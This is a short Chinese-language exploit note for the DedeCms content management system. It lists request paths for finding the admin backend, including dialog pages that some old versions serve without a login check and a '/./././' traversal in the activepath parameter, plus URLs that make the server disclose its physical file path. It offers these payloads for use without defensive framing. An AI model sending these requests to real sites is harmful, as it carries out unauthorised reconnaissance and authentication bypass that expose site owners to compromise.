DedeCms暴路径各大方法

影响版本

未知

利用方法

暴后台路径

1:include/dialog/select_soft.php
2:include/dialog/config.php
3:include/dialog/select_soft.php?activepath=/include/FCKeditor
4:include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
5:另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
6:require/dialog/select_soft.php?activepath=/././././././././
7:include\dialog\select_images.php
8:include\dialog\select_media.php
9:include\dialog\select_templets.php
10:robots.txt
11:include/dialog/select_media.php?f=form1.mur ​

暴物理路径

1:http://localhost/dedecmsgbk///member/inc/config_pay_yeepay.php
2:http://localhost/dedecmsgbk///member/inc/config_pay_tenpay.php
3:http://localhost/dedecmsgbk///member/inc/config_pay_nps.php
4:http://localhost/dedecmsgbk///member/inc/config_pay_cbpayment.php
5:http://localhost/dedecmsgbk///member/inc/config_pay_alipay.php
6:http://localhost/dedecmsgbk///include/downmix.inc.php
7:http://localhost/dedecmsgbk///dede/inc/inc_coonepage.php
8:http://localhost/dedecmsgbk///dede/inc/inc_archives_functions.php
9:http://localhost/dedecmsgbk///dede/diy_field_edit.php